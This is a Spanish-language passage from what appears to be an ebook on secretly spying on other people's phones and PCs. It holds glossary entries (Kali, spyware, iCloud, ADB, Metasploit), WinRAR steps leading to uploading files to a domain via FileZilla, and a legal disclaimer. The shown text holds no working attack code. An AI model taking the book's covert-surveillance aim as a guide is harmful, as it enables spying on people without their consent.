pruebas de penetración y auditorías de seguridad. Kali es una completa re-construcción de BackTrack Linux desde la base hacia arriba, y se adhiere completamente a los estándares de desarrollo de Debian. Toda la nueva infraestructura ha sido puesta en el lugar, todas las herramientas fueron revisadas y fueron embaladas. Spyware: Spyware o programa espía es un software que recopila información de un ordenador y después transmite esta información a una entidad externa sin el conocimiento o el consentimiento del propietario del ordenador. El término spyware también se utiliza más ampliamente para referirse a otros productos que no son estrictamente spyware. Estos productos, realizan diferentes funciones, como mostrar anuncios no solicitados (pop-up), recopilar información privada, redirigir solicitudes de páginas e instalar marcadores de teléfono. Lo cual puede ser muy peligroso. Un spyware típico se auto-instala en el sistema afectado de forma que se ejecuta cada vez que se pone en marcha el ordenador (utilizando CPU y memoria RAM, reduciendo la estabilidad del ordenador), y funciona todo el tiempo, controlando el uso que se hace de Internet y mostrando anuncios relacionados. iCloud: iCloud es una base de datos que permite el almacenamiento y distribución de tus datos personales entre tus dispositivos. Se asegura de que tengas siempre en todos la última versión de tus fotos, documentos, apps, notas y demás información importante. Puedes usarlo para compartir tus fotos, calendarios, ubicaciones y lo que quieras con tu familia en un pispás. Hasta te ayuda a encontrar tu Page | 105 dispositivo si lo has perdido. Con iCloud todo funciona automáticamente. Sin más.https://www.apple.com/es/icloud/ iTunes: iTunes es un reproductor de medios y tienda de contenidos multimedia desarrollado por Apple con el fin de reproducir, organizar y sincronizar iPods, iPhones, iPads y comprar música. Es compatible con ordenadores basados en sistemas operativos Mac OS X, Windows 2000, Windows XP, Windows Vista, Windows 7 y Windows 8. https://www.apple.com/es/itunes/ ADB: Las siglas ADB significan Android Debug Bridge y se corresponden con una herramienta que nos permite controlar el estado de nuestro smartphone Android. Así, por ejemplo, a través de ADB podemos actualizar el sistema, ejecutar comandos shell, administrar el direccionamiento de puertos o copiar arhivos. Básicamente, en ADB encontramos una colección de herramientas y comandos útiles que nos ayudarán a comunicar nuestro dispositivo directamente con el ordenador para, entre otros, acceder al modo recovery. Por supuesto, para que esto sea posible necesitamos un cable y conectar el smartphone vía USB con el ordenador. http://www.androidpit.es/que-es-adb-comandos-mas-importantes Metasploit: Metasploit es un proyecto open source de seguridad informática que proporciona información acerca de vulnerabilidades de seguridad y ayuda en tests de penetración "Pentesting" y el desarrollo de firmas para sistemas de detección de intrusos. http://www.metasploit.com/ WinRar: WinRAR 5.0 es un programa para abrir, crear y descomprimir archivos RAR, ZIP y otros formatos. Necesitamos descargarlo en caso de que tengamos archivos comprimidos. Siga estas instrucciones para entender su uso básico. Page | 106 Paso 1: Descargamos el WinRar de páginas confiables como Softonic.com Paso 2: Seguimos los paso de instalación, muy fáciles, que se pueden seguir por instinto. Luego, habiendo descargado el archivo comprimido, se verá como este. Paso 3: Damos click derecho al archivo y nos aparecerá un menú, en ese menú podemos usar la opción Extraer ficheros, la cual nos dará la opción de elegir en dónde queremos extraer los archivos. Page | 107 Paso 4: Seleccionamos dónde queremos que aparezca nuestro archivo extraído. Podemos elegir preferiblemente que sea en el escritorio, pues de esa manera tenemos la facilidad de ver lo que es, usarlo y luego organizarlo donde queramos. Pulsamos “Aceptar”. Ya podemos ver en nuestro escritorio lo que se extrajo, está el archivo comprimido y el archivo que salió de él, que es la carpeta que contiene los archivos que arrastraremos al FileZilla, para a su vez, subirlo a nuestro dominio. Recuerde que este conocimiento ha sido provisto solo por propósitos educaciones, no debería usarse para propósitos delictivos. La víctima de espionaje tiene derecho a demandarle siempre y cuando existan pruebas suficientes y si es ilegal en la región donde se practica. Este material no debe ser utilizado con propósitos comerciales sin la autorización del autor. No nos hacemos responsables si algo pudiera salir mal en el proceso de implementación de este material. Espiar Cualquier Celular y PC Totalmente Gratis © Page | 108